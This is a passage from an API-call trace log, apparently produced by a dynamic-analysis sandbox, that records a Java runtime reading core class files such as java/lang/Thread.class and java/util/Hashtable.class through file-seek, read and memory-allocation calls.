nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.159] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3230eb6, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52629174) returned 1 [0090.159] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x148, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x148, lpOverlapped=0x0) returned 1 [0090.159] free (_Block=0x2114500) [0090.160] free (_Block=0x2112680) [0090.162] strlen (_Str="java/lang/ref/PhantomReference.class") returned 0x24 [0090.162] malloc (_Size=0x48) returned 0x2111af0 [0090.162] malloc (_Size=0xa0) returned 0x121a6990 [0090.162] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f33a, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54653754) returned 1 [0090.163] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.164] malloc (_Size=0x25) returned 0x21144a0 [0090.164] free (_Block=0x121a6990) [0090.165] strlen (_Str="java/lang/ref/PhantomReference.class") returned 0x24 [0090.165] strcpy (in: _Dest=0x208f380, _Source="java/lang/ref/PhantomReference.class" | out: _Dest="java/lang/ref/PhantomReference.class") returned="java/lang/ref/PhantomReference.class" [0090.165] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3230ca1, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52628641) returned 1 [0090.165] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.167] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3230ce3, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52628707) returned 1 [0090.167] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x193, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x193, lpOverlapped=0x0) returned 1 [0090.167] free (_Block=0x2114260) [0090.167] free (_Block=0x2111870) [0090.170] strlen (_Str="sun/misc/Cleaner.class") returned 0x16 [0090.171] malloc (_Size=0x48) returned 0x2112680 [0090.171] malloc (_Size=0xa0) returned 0x121a6990 [0090.171] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f2f6, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54653686) returned 1 [0090.171] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.172] malloc (_Size=0x17) returned 0x2115650 [0090.172] free (_Block=0x121a6990) [0090.172] strlen (_Str="sun/misc/Cleaner.class") returned 0x16 [0090.172] strcpy (in: _Dest=0x208f380, _Source="sun/misc/Cleaner.class" | out: _Dest="sun/misc/Cleaner.class") returned="sun/misc/Cleaner.class" [0090.172] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3230678, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52627064) returned 1 [0090.172] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.173] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32306ac, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52627116) returned 1 [0090.173] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x5f5, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x5f5, lpOverlapped=0x0) returned 1 [0090.174] free (_Block=0x21144a0) [0090.174] free (_Block=0x2111af0) [0090.178] strlen (_Str="java/lang/ref/Finalizer.class") returned 0x1d [0090.178] malloc (_Size=0x48) returned 0x2111870 [0090.178] malloc (_Size=0xa0) returned 0x121a6990 [0090.178] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f2ab, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54653611) returned 1 [0090.178] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.179] malloc (_Size=0x1e) returned 0x2114500 [0090.180] free (_Block=0x121a6990) [0090.180] strlen (_Str="java/lang/ref/Finalizer.class") returned 0x1d [0090.180] strcpy (in: _Dest=0x208f380, _Source="java/lang/ref/Finalizer.class" | out: _Dest="java/lang/ref/Finalizer.class") returned="java/lang/ref/Finalizer.class" [0090.180] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x322faa0, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52624032) returned 1 [0090.180] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.185] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x322fadb, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52624091) returned 1 [0090.185] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xb9d, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0xb9d, lpOverlapped=0x0) returned 1 [0090.186] free (_Block=0x2115650) [0090.186] free (_Block=0x2112680) [0090.193] strlen (_Str="java/lang/ref/ReferenceQueue.class") returned 0x22 [0090.193] malloc (_Size=0x48) returned 0x2111af0 [0090.193] malloc (_Size=0xa0) returned 0x121a6990 [0090.193] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d699, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54646425) returned 1 [0090.193] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.194] malloc (_Size=0x23) returned 0x21143e0 [0090.195] free (_Block=0x121a6990) [0090.195] strlen (_Str="java/lang/ref/ReferenceQueue.class") returned 0x22 [0090.195] strcpy (in: _Dest=0x208f380, _Source="java/lang/ref/ReferenceQueue.class" | out: _Dest="java/lang/ref/ReferenceQueue.class") returned="java/lang/ref/ReferenceQueue.class" [0090.195] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c8e86, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52203142) returned 1 [0090.195] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.197] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c8ec6, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52203206) returned 1 [0090.198] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x9e7, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x9e7, lpOverlapped=0x0) returned 1 [0090.199] free (_Block=0x2114500) [0090.199] free (_Block=0x2111870) [0090.205] strlen (_Str="java/lang/Thread.class") returned 0x16 [0090.205] malloc (_Size=0x48) returned 0x2112680 [0090.205] malloc (_Size=0xa0) returned 0x121a6990 [0090.205] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f267, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54653543) returned 1 [0090.205] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.205] malloc (_Size=0x17) returned 0x21152b0 [0090.206] free (_Block=0x121a6990) [0090.206] strlen (_Str="java/lang/Thread.class") returned 0x16 [0090.206] strcpy (in: _Dest=0x208f380, _Source="java/lang/Thread.class" | out: _Dest="java/lang/Thread.class") returned="java/lang/Thread.class" [0090.207] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x322cafa, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52611834) returned 1 [0090.207] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.211] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x322cb2e, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52611886) returned 1 [0090.211] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x2f72, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x2f72, lpOverlapped=0x0) returned 1 [0090.214] free (_Block=0x21143e0) [0090.214] free (_Block=0x2111af0) [0090.217] strlen (_Str="java/lang/Runnable.class") returned 0x18 [0090.217] malloc (_Size=0x48) returned 0x2111ff0 [0090.217] malloc (_Size=0xa0) returned 0x121a6990 [0090.217] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f221, lpNewFilePointer=0x208e740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e740*=54653473) returned 1 [0090.217] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e710, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208e710*=0xa0, lpOverlapped=0x0) returned 1 [0090.219] malloc (_Size=0x19) returned 0x2113f30 [0090.219] free (_Block=0x121a6990) [0090.219] strlen (_Str="java/lang/Runnable.class") returned 0x18 [0090.219] strcpy (in: _Dest=0x208e8c0, _Source="java/lang/Runnable.class" | out: _Dest="java/lang/Runnable.class") returned="java/lang/Runnable.class" [0090.220] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x322ca20, lpNewFilePointer=0x208e340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e340*=52611616) returned 1 [0090.220] ReadFile (in: hFile=0x134, lpBuffer=0x208e390, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e310, lpOverlapped=0x0 | out: lpBuffer=0x208e390*, lpNumberOfBytesRead=0x208e310*=0x1e, lpOverlapped=0x0) returned 1 [0090.221] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x322ca56, lpNewFilePointer=0x208e3a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3a0*=52611670) returned 1 [0090.221] ReadFile (in: hFile=0x134, lpBuffer=0x121b7c00, nNumberOfBytesToRead=0xa4, lpNumberOfBytesRead=0x208e370, lpOverlapped=0x0 | out: lpBuffer=0x121b7c00*, lpNumberOfBytesRead=0x208e370*=0xa4, lpOverlapped=0x0) returned 1 [0090.221] free (_Block=0x21152b0) [0090.221] free (_Block=0x2112680) [0090.250] strlen (_Str="java/lang/ThreadGroup.class") returned 0x1b [0090.251] malloc (_Size=0x48) returned 0x2112680 [0090.251] malloc (_Size=0xa0) returned 0x121a6990 [0090.251] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f1d8, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54653400) returned 1 [0090.251] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.252] malloc (_Size=0x1c) returned 0x21145f0 [0090.252] free (_Block=0x121a6990) [0090.263] strlen (_Str="java/lang/ThreadGroup.class") returned 0x1b [0090.263] strcpy (in: _Dest=0x208f380, _Source="java/lang/ThreadGroup.class" | out: _Dest="java/lang/ThreadGroup.class") returned="java/lang/ThreadGroup.class" [0090.263] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x322aa89, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52603529) returned 1 [0090.263] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.265] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x322aac2, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52603586) returned 1 [0090.265] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x1f5e, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x1f5e, lpOverlapped=0x0) returned 1 [0090.266] free (_Block=0x2113f30) [0090.267] free (_Block=0x2111ff0) [0090.269] strlen (_Str="java/lang/Thread$UncaughtExceptionHandler.class") returned 0x2f [0090.269] malloc (_Size=0x48) returned 0x2111870 [0090.269] malloc (_Size=0xa0) returned 0x121a6990 [0090.269] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f17b, lpNewFilePointer=0x208e740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e740*=54653307) returned 1 [0090.269] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e710, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208e710*=0xa0, lpOverlapped=0x0) returned 1 [0090.270] malloc (_Size=0x30) returned 0x21129a0 [0090.271] free (_Block=0x121a6990) [0090.271] strlen (_Str="java/lang/Thread$UncaughtExceptionHandler.class") returned 0x2f [0090.271] strcpy (in: _Dest=0x208e8c0, _Source="java/lang/Thread$UncaughtExceptionHandler.class" | out: _Dest="java/lang/Thread$UncaughtExceptionHandler.class") returned="java/lang/Thread$UncaughtExceptionHandler.class" [0090.271] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x322a8fc, lpNewFilePointer=0x208e340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e340*=52603132) returned 1 [0090.271] ReadFile (in: hFile=0x134, lpBuffer=0x208e390, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e310, lpOverlapped=0x0 | out: lpBuffer=0x208e390*, lpNumberOfBytesRead=0x208e310*=0x1e, lpOverlapped=0x0) returned 1 [0090.272] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x322a949, lpNewFilePointer=0x208e3a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3a0*=52603209) returned 1 [0090.273] ReadFile (in: hFile=0x134, lpBuffer=0x121b6c10, nNumberOfBytesToRead=0x140, lpNumberOfBytesRead=0x208e370, lpOverlapped=0x0 | out: lpBuffer=0x121b6c10*, lpNumberOfBytesRead=0x208e370*=0x140, lpOverlapped=0x0) returned 1 [0090.273] free (_Block=0x21145f0) [0090.273] free (_Block=0x2112680) [0090.290] strlen (_Str="java/util/Properties.class") returned 0x1a [0090.290] malloc (_Size=0x48) returned 0x2112680 [0090.290] malloc (_Size=0xa0) returned 0x121a6990 [0090.290] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f133, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54653235) returned 1 [0090.290] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.291] malloc (_Size=0x1b) returned 0x2114290 [0090.292] free (_Block=0x121a6990) [0090.292] strlen (_Str="java/util/Properties.class") returned 0x1a [0090.292] strcpy (in: _Dest=0x208f380, _Source="java/util/Properties.class" | out: _Dest="java/util/Properties.class") returned="java/util/Properties.class" [0090.292] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3228c92, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52595858) returned 1 [0090.292] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.294] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3228cca, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52595914) returned 1 [0090.294] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x1c32, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x1c32, lpOverlapped=0x0) returned 1 [0090.296] free (_Block=0x21129a0) [0090.296] free (_Block=0x2111870) [0090.305] strlen (_Str="java/util/Hashtable.class") returned 0x19 [0090.305] malloc (_Size=0x48) returned 0x2111870 [0090.305] malloc (_Size=0xa0) returned 0x121a6990 [0090.305] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f0ec, lpNewFilePointer=0x208e7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e7c0*=54653164) returned 1 [0090.305] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e790, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208e790*=0xa0, lpOverlapped=0x0) returned 1 [0090.306] malloc (_Size=0x1a) returned 0x2114260 [0090.306] free (_Block=0x121a6990) [0090.307] strlen (_Str="java/util/Hashtable.class") returned 0x19 [0090.307] strcpy (in: _Dest=0x208e940, _Source="java/util/Hashtable.class" | out: _Dest="java/util/Hashtable.class") returned="java/util/Hashtable.class" [0090.307] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3225c8b, lpNewFilePointer=0x208e3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3c0*=52583563) returned 1 [0090.307] ReadFile (in: hFile=0x134, lpBuffer=0x208e410, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e390, lpOverlapped=0x0 | out: lpBuffer=0x208e410*, lpNumberOfBytesRead=0x208e390*=0x1e, lpOverlapped=0x0) returned 1 [0090.309] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3225cc2, lpNewFilePointer=0x208e420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e420*=52583618) returned 1 [0090.309] ReadFile (in: hFile=0x134, lpBuffer=0x121b68c0, nNumberOfBytesToRead=0x2fd0, lpNumberOfBytesRead=0x208e3f0, lpOverlapped=0x0 | out: lpBuffer=0x121b68c0*, lpNumberOfBytesRead=0x208e3f0*=0x2fd0, lpOverlapped=0x0) returned 1 [0090.311] free (_Block=0x2114290) [0090.312] free (_Block=0x2112680) [0090.315] strlen (_Str="java/util/Map.class") returned 0x13 [0090.315] malloc (_Size=0x48) returned 0x2112680 [0090.315] malloc (_Size=0xa0) returned 0x121a6990 [0090.315] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f0ab, lpNewFilePointer=0x208dd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd00*=54653099) returned 1 [0090.315] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dcd0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208dcd0*=0xa0, lpOverlapped=0x0) returned 1 [0090.316] malloc (_Size=0x14) returned 0x2115390 [0090.316] free (_Block=0x121a6990) [0090.317] strlen (_Str="java/util/Map.class") returned 0x13 [0090.317] strcpy (in: _Dest=0x208de80, _Source="java/util/Map.class" | out: _Dest="java/util/Map.class") returned="java/util/Map.class" [0090.317] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3224e12, lpNewFilePointer=0x208d900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d900*=52579858) returned 1 [0090.317] ReadFile (in: hFile=0x134, lpBuffer=0x208d950, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d8d0, lpOverlapped=0x0 | out: lpBuffer=0x208d950*, lpNumberOfBytesRead=0x208d8d0*=0x1e, lpOverlapped=0x0) returned 1 [0090.319] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3224e43, lpNewFilePointer=0x208d960, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d960*=52579907) returned 1 [0090.319] ReadFile (in: hFile=0x134, lpBuffer=0x121b9a00, nNumberOfBytesToRead=0xe48, lpNumberOfBytesRead=0x208d930, lpOverlapped=0x0 | out: lpBuffer=0x121b9a00*, lpNumberOfBytesRead=0x208d930*=0xe48, lpOverlapped=0x0) returned 1 [0090.320] free (_Block=0x2114260) [0090.320] free (_Block=0x2111870) [0090.342] strlen (_Str="java/util/Dictionary.class") returned 0x1a [0090.342] malloc (_Size=0x48) returned 0x2111870 [0090.342] malloc (_Size=0xa0) returned 0x121a6990 [0090.342] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f063, lpNewFilePointer=0x208dd80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd80*=54653027) returned 1 [0090.342] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dd50, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208dd50*=0xa0, lpOverlapped=0x0) returned 1 [0090.343] malloc (_Size=0x1b) returned 0x2113f30 [0090.344] free (_Block=0x121a6990) [0090.344] strlen (_Str="java/util/Dictionary.class") returned 0x1a [0090.344] strcpy (in: _Dest=0x208df00, _Source="java/util/Dictionary.class" | out: _Dest="java/util/Dictionary.class") returned="java/util/Dictionary.class" [0090.344] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3224b72, lpNewFilePointer=0x208d980, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d980*=52579186) returned 1 [0090.344] ReadFile (in: hFile=0x134, lpBuffer=0x208d9d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d950, lpOverlapped=0x0 | out: lpBuffer=0x208d9d0*, lpNumberOfBytesRead=0x208d950*=0x1e, lpOverlapped=0x0) returned 1 [0090.345] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3224baa, lpNewFilePointer=0x208d9e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9e0*=52579242) returned 1 [0090.345] ReadFile (in: hFile=0x134, lpBuffer=0x121b9a20, nNumberOfBytesToRead=0x268, lpNumberOfBytesRead=0x208d9b0, lpOverlapped=0x0 | out: lpBuffer=0x121b9a20*, lpNumberOfBytesRead=0x208d9b0*=0x268, lpOverlapped=0x0) returned 1 [0090.346] free (_Block=0x2115390) [0090.346] free (_Block=0x2112680) [0090.354] strlen (_Str="java/lang/reflect/AccessibleObject.class") returned 0x28 [0090.354] malloc (_Size=0x48) returned 0x2111af0 [0090.354] malloc (_Size=0xa0) returned 0x121a6990 [0090.354] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341f00d, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54652941) returned 1 [0090.354] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.355] malloc (_Size=0x29) returned 0x2112fa0 [0090.356] free (_Block=0x121a6990) [0090.356] strlen (_Str="java/lang/reflect/AccessibleObject.class") returned 0x28 [0090.356] strcpy (in: _Dest=0x208f380, _Source="java/lang/reflect/AccessibleObject.class" | out: _Dest="java/lang/reflect/AccessibleObject.class") returned="java/lang/reflect/AccessibleObject.class" [0090.356] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3223d95, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52575637) returned 1 [0090.356] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.359] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3223ddb, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52575707) returned 1 [0090.359] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xd97, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0xd97, lpOverlapped=0x0) returned 1 [0090.359] free (_Block=0x2113f30) [0090.360] free (_Block=0x2111870) [0090.366] strlen (_Str="java/lang/reflect/Field.class") returned 0x1d [0090.367] malloc (_Size=0x48) returned 0x2111c30 [0090.367] malloc (_Size=0xa0) returned 0x121a6990 [0090.367] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341efc2, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54652866) returned 1 [0090.367] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.368] malloc (_Size=0x1e) returned 0x2113f30 [0090.368] free (_Block=0x121a6990) [0090.368] strlen (_Str="java/lang/reflect/Field.class") returned 0x1d [0090.368] strcpy (in: _Dest=0x208f380, _Source="java/lang/reflect/Field.class" | out: _Dest="java/lang/reflect/Field.class") returned="java/lang/reflect/Field.class" [0090.368] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32217a8, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52565928) returned 1 [0090.369] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.370] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32217e3, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52565987) returned 1 [0090.371] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x25b2, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x25b2, lpOverlapped=0x0) returned 1 [0090.382] free (_Block=0x2112fa0) [0090.383] free 